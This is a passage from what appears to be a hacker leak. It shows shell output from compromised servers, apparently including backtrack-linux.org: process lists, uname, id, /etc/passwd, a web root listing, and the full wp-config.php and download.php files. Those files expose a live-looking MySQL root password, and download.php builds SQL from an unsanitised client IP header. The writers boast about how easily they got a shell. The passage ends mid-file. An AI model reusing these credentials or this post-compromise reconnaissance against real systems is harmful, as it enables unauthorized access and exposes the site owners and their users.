  3391. www-data 10874  0.0  0.6 354384 38764 ?        S    14:15   0:00 /usr/sbin/apache2 -k start
  3392. www-data 10909  0.0  0.0  25632  2876 ?        S    14:15   0:00 dhcpcd
  3393. www-data 10910  0.0  0.0   4096   656 ?        S    14:15   0:00 /bin/sh
  3394. www-data 13491  0.1  0.6 356496 39580 ?        S    14:54   0:01 /usr/sbin/apache2 -k start
  3395. root     13493  0.1  0.1 116628 11268 ?        S    14:54   0:00 /usr/bin/svnserve -d -r /var/svn/
  3396. www-data 13510  0.0  0.0   4040   524 ?        S    14:55   0:00 cat www.tar.gz
  3397. root     13561  0.0  0.0 107420  1940 ?        S    Nov30   0:00 /usr/bin/svnserve -d -r /var/svn/
  3398. www-data 13681  0.1  0.5 354240 32356 ?        S    14:57   0:00 /usr/sbin/apache2 -k start
  3399. www-data 13884  0.1  0.5 354792 33064 ?        S    14:59   0:00 /usr/sbin/apache2 -k start
  3400. www-data 13889  0.2  0.5 353632 31568 ?        S    14:59   0:01 /usr/sbin/apache2 -k start
  3401. www-data 13960  0.0  0.6 354384 38812 ?        S    15:01   0:00 /usr/sbin/apache2 -k start
  3402. www-data 13976  0.2  0.5 355192 32200 ?        S    15:01   0:00 /usr/sbin/apache2 -k start
  3403. www-data 14022  0.0  0.0  25632  2876 ?        S    15:02   0:00 dhcpcd
  3404. www-data 14023  0.0  0.0   4096   628 ?        S    15:02   0:00 /bin/sh
  3405. www-data 14026  0.2  0.5 353888 33228 ?        S    15:02   0:00 /usr/sbin/apache2 -k start
  3406. www-data 14027  0.1  0.5 356512 32860 ?        S    15:02   0:00 /usr/sbin/apache2 -k start
  3407. www-data 14062  0.2  0.5 353548 32144 ?        S    15:03   0:00 /usr/sbin/apache2 -k start
  3408. www-data 14063  0.1  0.5 353644 30840 ?        S    15:03   0:00 /usr/sbin/apache2 -k start
  3409. www-data 14152  0.2  0.5 353376 31236 ?        S    15:04   0:00 /usr/sbin/apache2 -k start
  3410. www-data 14154  0.3  0.5 352856 31284 ?        S    15:04   0:00 /usr/sbin/apache2 -k start
  3411. www-data 14159  0.1  0.5 353888 30852 ?        S    15:04   0:00 /usr/sbin/apache2 -k start
  3412. www-data 14160  0.2  0.5 355332 31280 ?        S    15:04   0:00 /usr/sbin/apache2 -k start
  3413. www-data 14163  0.1  0.5 354204 31520 ?        S    15:04   0:00 /usr/sbin/apache2 -k start
  3414. www-data 14183  0.1  0.4 353804 30404 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
  3415. www-data 14185  0.2  0.4 352724 30460 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
  3416. www-data 14188  0.2  0.5 353544 32600 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
  3417. www-data 14194  0.1  0.4 353880 30564 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
  3418. www-data 14201  0.1  0.5 353500 31264 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
  3419. www-data 14204  0.2  0.5 354516 32044 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
  3420. www-data 14205  0.1  0.4 353360 29148 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
  3421. ossecm   14276  0.0  0.0  16844   644 ?        S    Dec02   0:01 /var/ossec/bin/ossec-maild
  3422. root     14286  0.0  0.0  12496   576 ?        S    Dec02   0:03 /var/ossec/bin/ossec-execd
  3423. ossec    14291  0.0  0.0  14924  3052 ?        S    Dec02   0:43 /var/ossec/bin/ossec-analysisd
  3424. root     14295  0.0  0.0   4236   584 ?        S    Dec02   0:22 /var/ossec/bin/ossec-logcollector
  3425. www-data 14315  0.0  0.4 352972 29480 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
  3426. www-data 14316  0.2  0.5 353360 31168 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
  3427. www-data 14317  0.1  0.5 354404 30832 ?        S    15:05   0:00 /usr/sbin/apache2 -k start
  3428. www-data 14345  0.2  0.4 352592 30052 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3429. www-data 14346  0.1  0.4 354008 30416 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3430. www-data 14348  0.1  0.4 352356 29156 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3431. www-data 14350  0.0  0.1 347492 10892 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3432. www-data 14351  0.1  0.4 353272 30452 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3433. www-data 14352  0.3  0.5 354176 31516 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3434. www-data 14355  0.3  0.4 352328 29492 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3435. www-data 14356  0.2  0.5 354200 31508 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3436. www-data 14357  0.0  0.4 352584 28180 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3437. root     14361  0.0  0.0   4996  1664 ?        S    Dec02   0:34 /var/ossec/bin/ossec-syscheckd
  3438. ossec    14365  0.0  0.0  12764   844 ?        S    Dec02   0:00 /var/ossec/bin/ossec-monitord
  3439. www-data 14366  0.2  0.4 352348 29836 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3440. www-data 14367  0.1  0.4 353492 30468 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3441. www-data 14369  0.1  0.4 353424 30616 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3442. www-data 14370  0.1  0.5 356216 31440 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3443. www-data 14371  0.2  0.5 353996 31636 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3444. www-data 14372  0.1  0.4 352356 28228 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3445. www-data 14377  0.0  0.1 347236 10808 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3446. www-data 14378  0.2  0.4 352612 29308 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3447. root     14386  0.0  0.0      0     0 ?        Z    15:07   0:00 [host-deny.sh] <defunct>
  3448. root     14387  0.0  0.0      0     0 ?        Z    15:07   0:00 [firewall-drop.s] <defunct>
  3449. www-data 14407  0.4  0.5 354384 32672 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3450. www-data 14408  0.1  0.4 352604 29276 ?        S    15:07   0:00 /usr/sbin/apache2 -k start
  3451. www-data 14412  0.3  0.5 354716 32420 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3452. www-data 14413  0.4  0.4 352592 29272 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3453. www-data 14414  0.2  0.4 352600 28200 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3454. www-data 14415  0.3  0.4 352724 29088 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3455. www-data 14416  0.2  0.4 353776 29452 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3456. www-data 14417  0.2  0.4 353136 28616 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3457. www-data 14418  0.3  0.4 353520 29500 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3458. www-data 14419  0.7  0.0      0     0 ?        Z    15:08   0:00 [apache2] <defunct>
  3459. www-data 14420  0.5  0.5 353976 31084 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3460. www-data 14421  0.3  0.4 353252 29180 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3461. www-data 14422  0.0  0.1 346724  8076 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3462. www-data 14423  0.6  0.5 354352 31720 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3463. www-data 14424  0.4  0.4 353808 29848 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3464. www-data 14425  0.3  0.4 352584 28252 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3465. www-data 14426  0.1  0.1 346748 10564 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3466. www-data 14427  0.6  0.4 352976 28944 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3467. www-data 14428  0.0  0.1 346724  8204 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3468. www-data 14429  0.0  0.1 346724  8196 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3469. www-data 14430  0.7  0.4 352976 29032 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3470. www-data 14431  0.9  0.4 353668 30120 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3471. www-data 14432  0.9  0.4 353368 29668 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3472. www-data 14433  0.8  0.4 352976 28836 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3473. www-data 14435  1.3  0.4 352716 29364 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3474. www-data 14436  1.8  0.4 353736 30320 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3475. www-data 14437  0.1  0.1 346236  7760 ?        S    15:08   0:00 /usr/sbin/apache2 -k start
  3476. www-data 14438  0.0  0.0  14976  1116 ?        R    15:08   0:00 ps aux
  3477. root     19786  0.0  0.0 107420  1884 ?        S    Nov16   0:00 /usr/bin/svnserve -d -r /var/svn/
  3478. root     19983  0.0  0.0 107420  1940 ?        S    Nov29   0:00 /usr/bin/svnserve -d -r /var/svn/
  3479. root     19989  0.0  0.0 107420  1884 ?        S    Nov16   0:00 /usr/bin/svnserve -d -r /var/svn/
  3480. root     20015  0.0  0.0 107420  1884 ?        S    Nov16   0:00 /usr/bin/svnserve -d -r /var/svn/
  3481. root     20286  0.0  0.0 107420  1888 ?        S    Nov18   0:00 /usr/bin/svnserve -d -r /var/svn/
  3482. mysql    22394 10.4 24.9 2441860 1529604 ?     Ssl  Nov12 3357:17 /usr/sbin/mysqld
  3483.  
  3484. $ df -h
  3485. Filesystem            Size  Used Avail Use% Mounted on
  3486. /dev/sda1              48G   17G   29G  37% /
  3487. none                  3.0G  172K  3.0G   1% /dev
  3488. none                  3.0G     0  3.0G   0% /dev/shm
  3489. none                  3.0G   56K  3.0G   1% /var/run
  3490. none                  3.0G     0  3.0G   0% /var/lock
  3491. none                  3.0G     0  3.0G   0% /lib/init/rw
  3492. none                   48G   17G   29G  37% /var/lib/ureadahead/debugfs
  3493.  
  3494. Wordpress:
  3528.  
  3529. ,_._._._._._._._|____________________________________________________
  3530. |_|_|_|_|_|_|_|_|___________________________________________________/
  3531.   ~ backtrack ~ !                                                    
  3532.                                                                      
  3533. Since we already tapped into exploit-db and their server lies  in  the
  3534. same subnet  with  backtrack,  we  decided  to  check  out  their  mad
  3535. security. Backtrack is run by muts, the same guy who also  administers
  3536. exploit-db, so no wonder why it was super easy to get a shell...      
  3537.  
  3538.  
  3539. $ uname -a
  3540. Linux backtrack-linux.org 2.6.32.26-175.fc12.x86_64 #1 SMP Wed Dec 1 21:39:34 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux
  3541.  
  3542. $ id
  3543. uid=48(apache) gid=494(apache) groups=494(apache) context=unconfined_u:system_r:httpd_t:s0
  3544.  
  3545. $ alias ls="ls -la"
  3546.  
  3547. $ ls
  3548. total 110
  3549. dr-xr-xr-x.  25 root root  4096 Dec  7 08:42 .
  3550. dr-xr-xr-x.  25 root root  4096 Dec  7 08:42 ..
  3551. -rw-r--r--.   1 root root     0 Dec  7 08:42 .autofsck
  3552. drwx------.   2 root root  4096 Dec 10 03:40 backup
  3553. dr-xr-xr-x.   2 root root  4096 Nov 29 19:59 bin
  3554. dr-xr-xr-x.   5 root root  1024 Dec  7 08:41 boot
  3555. drwxr-xr-x.  17 root root  3580 Dec  7 08:43 dev
  3556. drwxr-xr-x.  66 root root  4096 Dec  7 08:42 etc
  3557. drwxr-xr-x.   3 root root  4096 Aug 14 20:50 home
  3558. dr-xr-xr-x.   9 root root  4096 Aug 11 04:01 lib
  3559. dr-xr-xr-x.   9 root root 12288 Nov 29 20:00 lib64
  3560. drwx------.   2 root root 16384 Aug 11 02:01 lost+found
  3561. drwxr-xr-x.   2 root root  4096 Aug 11 04:42 maint
  3562. drwxr-xr-x.   2 root root  4096 Aug 25  2009 media
  3563. drwxr-xr-x.   2 root root  4096 Aug 25  2009 mnt
  3564. drwxr-xr-x.   2 root root  4096 Aug 25  2009 opt
  3565. dr-xr-xr-x. 160 root root     0 Dec  7 08:42 proc
  3566. drwxr-xr-x.   5 root root  4096 Dec  3 17:16 recovery
  3567. dr-xr-x---.   4 root root  4096 Dec 10 08:50 root
  3568. dr-xr-xr-x.   2 root root 12288 Nov 29 19:59 sbin
  3569. drwxr-xr-x.   7 root root     0 Dec  7 08:42 selinux
  3570. drwxr-xr-x.   2 root root  4096 Aug 25  2009 srv
  3571. drwxr-xr-x.  13 root root     0 Dec  7 08:42 sys
  3572. drwxrwxrwt.   4 root root  4096 Dec 10 14:08 tmp
  3573. drwxr-xr-x.  14 root root  4096 Aug 11 02:03 usr
  3574. drwxr-xr-x.  20 root root  4096 Aug 14 20:45 var
  3575.  
  3576.  
  3577. $ cat /etc/issue
  3578. Fedora release 12 (Constantine)
  3579. Kernel \r on an \m (\l)
  3580.  
  3581. $ cat /etc/passwd
  3582. root:x:0:0:root:/root:/bin/bash
  3583. bin:x:1:1:bin:/bin:/sbin/nologin
  3584. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  3585. adm:x:3:4:adm:/var/adm:/sbin/nologin
  3586. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  3587. sync:x:5:0:sync:/sbin:/bin/sync
  3588. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  3589. halt:x:7:0:halt:/sbin:/sbin/halt
  3590. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  3591. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  3592. operator:x:11:0:operator:/root:/sbin/nologin
  3593. games:x:12:100:games:/usr/games:/sbin/nologin
  3594. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  3595. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  3596. nobody:x:99:99:Nobody:/:/sbin/nologin
  3597. vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin
  3598. dbus:x:81:81:System message bus:/:/sbin/nologin
  3599. mailnull:x:47:497::/var/spool/mqueue:/sbin/nologin
  3600. smmsp:x:51:496::/var/spool/mqueue:/sbin/nologin
  3601. sshd:x:74:495:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  3602. apache:x:48:494:Apache:/var/www:/sbin/nologin
  3603. mysql:x:27:493:MySQL Server:/var/lib/mysql:/bin/bash
  3604. ossec:x:500:500::/var/ossec:/sbin/nologin
  3605. ossecm:x:501:500::/var/ossec:/sbin/nologin
  3606. ossecr:x:502:500::/var/ossec:/sbin/nologin
  3607. ntp:x:38:38::/etc/ntp:/sbin/nologin
  3608. tcpdump:x:72:72::/:/sbin/nologin
  3609.  
  3610. $ cd
  3611. /var/www/html/
  3612.  
  3613. $ ls
  3614. total 90224
  3615. drwxr-xr-x. 13 apache apache     4096 Dec  9 12:21 .
  3616. drwxr-xr-x.  6 root   root       4096 Aug 18 10:30 ..
  3617. -rw-r--r--.  1 apache apache     4183 Dec  5 16:50 .htaccess
  3618. -rw-r--r--.  1 apache apache     1156 Aug 11 03:17 HT
  3619. -rw-r--r--.  1 apache apache     2233 Aug 11 03:17 HT-ORIG
  3620. -rw-r--r--.  1 apache apache  1526525 Nov 11 14:01 IMG_0585.JPG
  3621. drwxr-xr-x.  2 apache apache     4096 Aug 11 03:16 ads
  3622. -rw-r--r--.  1 apache apache   125832 Nov 19 12:18 bootsplash.jpg
  3623. -rw-r--r--.  1 apache apache   754444 Aug 11 03:16 bt-nsa.png
  3624. -rw-r--r--.  1 apache apache   757498 Aug 11 03:16 bt-nsa2.png
  3625. -rw-r--r--.  1 apache apache    81597 Aug 11 03:16 bt4-final-vm.zip.torrent
  3626. -rw-r--r--.  1 apache apache    60094 Aug 11 03:16 bt4-final.iso.torrent
  3627. -rw-r--r--.  1 apache apache       44 Aug 11 03:16 bt4r1.txt
  3628. -rw-r--r--.  1 root   root     686248 Nov 23 10:47 bt4r2.png
  3629. -rw-r--r--.  1 apache apache   160728 Aug 11 03:16 btfail.png
  3630. -rw-r--r--.  1 apache apache      476 Aug 11 03:16 collapsible_ad.html
  3631. -rwxr-xr-x.  1 apache apache 13397784 Aug 11 03:16 d.bin
  3632. -rw-r--r--.  1 apache apache      121 Aug 11 03:16 d.lic
  3633. -rw-r--r--.  1 apache apache 12844822 Aug 11 03:16 d32.bin
  3634. drwxr-xr-x.  2 apache apache     4096 Aug 11 03:16 documents
  3635. -rw-r--r--.  1 apache apache     3342 Aug 11 03:16 down.php
  3636. -rw-r--r--.  1 apache apache     4158 Aug 11 03:16 download-orig.php
  3637. -rw-r--r--.  1 apache apache     4945 Nov 22 11:38 download.php
  3638. -rw-r--r--.  1 apache apache    15125 Aug 11 03:16 error.php
  3639. -rw-r--r--.  1 apache apache   137383 Aug 11 03:16 example-2.jpg
  3640. -rw-r--r--.  1 apache apache     1150 Aug 11 03:16 favicon.ico
  3641. drwxr-xr-x. 21 apache apache     4096 Nov 22 18:56 forums
  3642. -rw-r--r--.  1 apache apache    87176 Aug 11 03:17 google.png
  3643. -rw-r--r--.  1 apache apache       53 Aug 11 03:17 googled6c4817aa45e0032.html
  3644. -rw-r--r--.  1 apache apache       23 Aug 11 03:17 googlehostedservice.html
  3645. -rw-r--r--.  1 apache apache  1978856 Sep 17 08:06 hola.jpg
  3646. -rw-r--r--.  1 apache apache  2264271 Sep 17 08:12 hola1.jpg
  3647. -rw-r--r--.  1 apache apache  2197361 Sep 17 08:15 hola2.jpg
  3648. -rw-r--r--.  1 apache apache   315306 Aug 11 03:17 hola22.png
  3649. -rw-r--r--.  1 apache apache   169202 Aug 11 03:17 hola23.png
  3650. drwxr-xr-x.  8 apache apache     4096 Nov 21 16:38 images
  3651. -rw-r--r--.  1 apache apache        3 Aug 11 03:17 index.html
  3652. -rw-r--r--.  1 apache apache      397 Dec  9 12:20 index.php
  3653. -rw-r--r--.  1 apache apache   321196 Nov 19 15:06 kanji.png
  3654. -rw-r--r--.  1 apache apache   147841 Sep  4 12:37 knock-0.5.tar.gz
  3655. -rw-r--r--.  1 apache apache    15410 Dec  9 12:20 license.txt
  3656. -rw-r--r--.  1 apache apache 48404480 Nov 14 15:53 mediawiki-1.16.0.tar
  3657. -rw-r--r--.  1 apache apache    13946 Aug 11 03:17 nv-xorg.conf
  3658. -rw-r--r--.  1 apache apache  1382400 Oct 26 10:38 oiopub-direct.tar
  3659. -rw-r--r--.  1 apache apache  1508471 Aug 11 03:17 p2270016.jpg
  3660. -rw-r--r--.  1 apache apache  1636957 Aug 11 03:17 p2280018.jpg
  3661. drwxr-xr-x.  2 apache apache     4096 Nov 22 11:46 patches
  3662. -rw-r--r--.  1 apache apache      582 Nov 22 11:21 r2.php
  3663. -rw-r--r--.  1 apache apache     9120 Dec  9 12:20 readme.html
  3664. -rw-r--r--.  1 apache apache      712 Nov 10 22:27 s.php
  3665. -rw-r--r--.  1 apache apache       63 Aug 11 03:17 show.dud.php
  3666. -rw-r--r--.  1 apache apache      801 Aug 11 03:17 show.original.php
  3667. -rw-r--r--.  1 apache apache       31 Aug 11 03:17 show.php
  3668. -rw-r--r--.  1 apache apache      601 Nov 10 22:28 show.stats.working.php
  3669. -rw-r--r--.  1 apache apache    38971 Dec  7 23:23 sitemap.xml
  3670. -rw-r--r--.  1 apache apache     2485 Dec  7 23:23 sitemap.xml.gz
  3671. drwxr-xr-x.  3 apache apache     4096 Aug 11 03:17 slider
  3672. -rw-r--r--.  1 apache apache   714372 Aug 11 03:17 spot-the-release.png
  3673. -rw-r--r--.  1 apache apache     1536 Aug 11 03:17 stats.php
  3674. -rw-r--r--.  1 apache apache       33 Dec 10 03:34 stats.txt
  3675. -rw-r--r--.  1 apache apache    23660 Aug 11 03:17 style.css
  3676. -rw-r--r--.  1 apache apache        5 Aug 11 03:17 test.php
  3677. drwxr-xr-x.  2 apache apache     4096 Nov 22 09:22 torrents
  3678. drwxr-xr-x. 15 apache apache     4096 Nov 27 16:52 wiki
  3679. -rw-r--r--.  1 apache apache     4391 Dec  9 12:20 wp-activate.php
  3680. drwxr-xr-x.  8 apache apache     4096 Dec  5 08:12 wp-admin
  3681. -rw-r--r--.  1 apache apache    40284 Dec  9 12:20 wp-app.php
  3682. -rw-r--r--.  1 apache apache      220 Dec  9 12:20 wp-atom.php
  3683. -rw-r--r--.  1 apache apache      274 Dec  9 12:20 wp-blog-header.php
  3684. -rw-r--r--.  1 apache apache     3926 Dec  9 12:20 wp-comments-post.php
  3685. -rw-r--r--.  1 apache apache      238 Dec  9 12:20 wp-commentsrss2.php
  3686. -rw-r--r--.  1 apache apache     3173 Dec  9 12:20 wp-config-sample.php
  3687. -rw-r--r--.  1 apache apache     2696 Nov 22 19:32 wp-config.php
  3688. drwxr-xr-x.  9 apache apache     4096 Dec  9 12:21 wp-content
  3689. -rw-r--r--.  1 apache apache     1255 Dec  9 12:20 wp-cron.php
  3690. -rw-r--r--.  1 apache apache      240 Dec  9 12:20 wp-feed.php
  3691. drwxr-xr-x.  8 apache apache     4096 Aug 13 20:06 wp-includes
  3692. -rw-r--r--.  1 apache apache     2002 Dec  9 12:20 wp-links-opml.php
  3693. -rw-r--r--.  1 apache apache     2441 Dec  9 12:20 wp-load.php
  3694. -rw-r--r--.  1 apache apache    26059 Dec  9 12:20 wp-login.php
  3695. -rw-r--r--.  1 apache apache     7774 Dec  9 12:20 wp-mail.php
  3696. -rw-r--r--.  1 apache apache      487 Dec  9 12:20 wp-pass.php
  3697. -rw-r--r--.  1 apache apache      218 Dec  9 12:20 wp-rdf.php
  3698. -rw-r--r--.  1 apache apache      316 Dec  9 12:20 wp-register.php
  3699. -rw-r--r--.  1 apache apache      218 Dec  9 12:20 wp-rss.php
  3700. -rw-r--r--.  1 apache apache      220 Dec  9 12:20 wp-rss2.php
  3701. -rw-r--r--.  1 apache apache     9177 Dec  9 12:20 wp-settings.php
  3702. -rw-r--r--.  1 apache apache    18695 Dec  9 12:20 wp-signup.php
  3703. -rw-r--r--.  1 apache apache     3702 Dec  9 12:20 wp-trackback.php
  3704. -rw-r--r--.  1 root   root      99665 Nov 24 00:52 wtfff.png
  3705. -rw-r--r--.  1 apache apache       85 Nov 20 13:43 x.gif
  3706. -rw-r--r--.  1 apache apache    95481 Dec  9 12:20 xmlrpc.php
  3707.  
  3708. $ cat wp-config.php
  3709. <?php
  3710. /** Enable W3 Total Cache **/
  3711. define('WP_CACHE', true); // Added by W3 Total Cache
  3712.  
  3713. /**
  3714.  * The base configurations of the WordPress.
  3715.  *
  3716.  * This file has the following configurations: MySQL settings, Table Prefix,
  3717.  * Secret Keys, WordPress Language, and ABSPATH. You can find more information by
  3718.  * visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
  3719.  * wp-config.php} Codex page. You can get the MySQL settings from your web host.
  3720.  *
  3721.  * This file is used by the wp-config.php creation script during the
  3722.  * installation. You don't have to use the web site, you can just copy this file
  3723.  * to "wp-config.php" and fill in the values.
  3724.  *
  3725.  * @package WordPress
  3726.  */
  3727.  
  3728. // ** MySQL settings - You can get this info from your web host ** //
  3729. /** The name of the database for WordPress */
  3730. define('DB_NAME', 'blog');
  3731.  
  3732. /** MySQL database username */
  3733. define('DB_USER', 'root');
  3734.  
  3735. /** MySQL database password */
  3736. define('DB_PASSWORD', '234hi2u3d98as7d23kuh');
  3737.  
  3738. /** MySQL hostname */
  3739. define('DB_HOST', 'localhost');
  3740.  
  3741. /** Database Charset to use in creating database tables. */
  3742. define('DB_CHARSET', 'utf8');
  3743.  
  3744. /** The Database Collate type. Don't change this if in doubt. */
  3745. define('DB_COLLATE', '');
  3746.  
  3747. /**#@+
  3748.  * Authentication Unique Keys.
  3749.  *
  3750.  * Change these to different unique phrases!
  3751.  * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/ WordPress.org secret-key service}
  3752.  * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
  3753.  *
  3754.  * @since 2.6.0
  3755.  */
  3756. define('AUTH_KEY', 'put your unique phrase here');
  3757. define('SECURE_AUTH_KEY', 'put your unique phrase here');
  3758. define('LOGGED_IN_KEY', 'put your unique phrase here');
  3759. define('NONCE_KEY', 'put your unique phrase here');
  3760. /**#@-*/
  3761.  
  3762. /**
  3763.  * WordPress Database Table prefix.
  3764.  *
  3765.  * You can have multiple installations in one database if you give each a unique
  3766.  * prefix. Only numbers, letters, and underscores please!
  3767.  */
  3768. $table_prefix  = 'wp_';
  3769.  
  3770. /**
  3771.  * WordPress Localized Language, defaults to English.
  3772.  *
  3773.  * Change this to localize WordPress.  A corresponding MO file for the chosen
  3774.  * language must be installed to wp-content/languages. For example, install
  3775.  * de.mo to wp-content/languages and set WPLANG to 'de' to enable German
  3776.  * language support.
  3777.  */
  3778. define ('WPLANG', '');
  3779.  
  3780. /* That's all, stop editing! Happy blogging. */
  3781.  
  3782. /** WordPress absolute path to the Wordpress directory. */
  3783. if ( !defined('ABSPATH') )
  3784.         define('ABSPATH', dirname(__FILE__) . '/');
  3785.  
  3786. /** Sets up WordPress vars and included files. */
  3787. require_once(ABSPATH . 'wp-settings.php');
  3788.  
  3789. $ cat show.php
  3790. <?php
  3791. include 'stats.txt';
  3792. ?>
  3793. $ cat stats.txt
  3794. BackTrack 4 - 4916323 downloads
  3795.  
  3796. $ cat download.php
  3797. <?php
  3798.  
  3799. // DO NOT CHANGE THIS FILE WITHOUT TALKING TO MUTS FIRST> EVEN IF YOU THINK YOU KNOW WHAT YOU ARE DOING!!!
  3800.  
  3801. function getRealIpAddr()
  3802. {
  3803.     if (!empty($_SERVER['HTTP_CLIENT_IP']))   //check ip from share internet
  3804.     {
  3805.       $ip=$_SERVER['HTTP_CLIENT_IP'];
  3806.     }
  3807.     elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))   //to check ip is pass from proxy
  3808.     {
  3809.       $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
  3810.     }
  3811.     else
  3812.     {
  3813.       $ip=$_SERVER['REMOTE_ADDR'];
  3814.     }
  3815.     return $ip;
  3816. }
  3817.  
  3818. $ip=getRealIpAddr();
  3819.  
  3820. $username="root";
  3821. $password="234hi2u3d98as7d23kuh";
  3822. $database="counter";
  3823.  
  3824. function choose($iso)
  3825. {
  3826.  
  3827.  $num = Rand (1,5);
  3828.  switch ($num)
  3829.  {
  3830.   case 1:
  3831.   $link="ftp://ftp.uio.no/pub/security/backtrack/$iso";
  3832.   break;
  3833.  
  3834.   case 2:
  3835.   $link="http://ftp.uio.no/pub/security/backtrack/$iso";
  3836.   break;
  3837.  
  3838.   case 3:
  3839.   $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso";
  3840.                 break;
  3841.  
  3842.   case 4:
  3843.   $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso";
  3844.                 break;
  3845.  
  3846.   case 5:
  3847.   $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso";
  3848.                 break;
  3849.  
  3850. //  case 6:
  3851. //  $link="http://moon.backtrack-linux.org/downloads/$iso";
  3852. //  break;
  3853.  
  3854.  
  3855.  }
  3856.  
  3857.  
  3858. return $link;
  3859.  
  3860. }
  3861.  
  3862.  
  3863. $version=$_GET["fname"];
  3864.  
  3865. if (! (($version=="bt4f") or ($version=="bt4fvm") or ($version=="bt4r1") or ($version=="bt4r1vm") or ($version=="bt3") or ($version=="bt4pf") or ($version=="bt4b") or ($version=="bt4bvm") or ($version=="bt4r2") or ($version=="bt4r2vm")))
  3866.  
  3867. {
  3868.  echo "This page cannot be accessed directly.";
  3869.  exit;
  3870. }
  3871.  
  3872. if ($version=="bt4r2")
  3873. {
  3874.  
  3875.         $iso="bt4-r2.iso";
  3876.         $link=choose($iso);
  3877.  
  3878. mysql_connect("localhost",$username,$password);
  3879. @mysql_select_db($database) or die( "Unable to select database");
  3880. $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  3881. mysql_query($query);
  3882. mysql_close();
  3883.  
  3884.         header( "Location: $link ");
  3885.         exit;
  3886. }
  3887.  
  3888.  
  3889. if ($version=="bt4r2vm")
  3890. {
  3891.  
  3892.         $iso="bt4-r2-vm.tar.bz2";
  3893.         $link=choose($iso);
  3894.  
  3895. mysql_connect("localhost",$username,$password);
  3896. @mysql_select_db($database) or die( "Unable to select database");
  3897. $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  3898. mysql_query($query);
  3899. mysql_close();
  3900.  
  3901.         header( "Location: $link ");
  3902.         exit;
  3903. }
  3904.  
  3905.  
  3906.  
  3907. if ($version=="bt4f")
  3908. {
  3909.  
  3910.  $iso="bt4-final.iso";
  3911.  $link=choose($iso);
  3912.  
  3913. mysql_connect("localhost",$username,$password);
  3914. @mysql_select_db($database) or die( "Unable to select database");
  3915. $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  3916. mysql_query($query);
  3917. mysql_close();
  3918.  
  3919.  header( "Location: $link ");
  3920.  exit;
  3921. }
  3922.  
  3923. elseif ($version=="bt4fvm")
  3924. {
  3925.  $iso="bt4-final-vm.zip";
  3926.  $link=choose($iso);
  3927.  
  3928. mysql_connect("localhost",$username,$password);
  3929. @mysql_select_db($database) or die( "Unable to select database");
  3930. $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")";
  3931. mysql_query($query);
  3932. mysql_close();
  3933.  
  3934.  header( "Location: $link ");
  3935.  exit;
  3936. }
  3937.  
  3938. elseif ($version=="bt4r1")
  3939. {
